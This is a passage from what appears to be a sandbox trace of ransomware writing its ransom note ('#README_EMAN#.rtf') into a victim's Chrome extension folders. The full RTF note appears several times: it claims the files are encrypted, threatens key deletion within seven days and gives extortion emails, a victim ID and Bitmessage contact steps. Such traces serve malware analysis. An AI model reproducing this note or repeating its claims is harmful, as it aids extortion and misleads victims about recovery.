translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n=typeof b)return b;try{\x03\x1e", lpUsedDefaultChar=0x0) returned 8717 [0283.734] WriteFile (in: hFile=0x2cc, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0283.737] CloseHandle (hObject=0x2cc) returned 1 [0283.737] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\#readme_eman#.rtf")) returned 0xffffffff [0283.737] GetLastError () returned 0x2 [0283.737] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0283.738] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.738] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of 